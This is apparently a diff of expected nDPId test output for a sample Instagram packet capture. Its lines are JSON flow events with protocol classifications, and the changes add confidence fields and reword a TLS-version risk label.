-00597{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
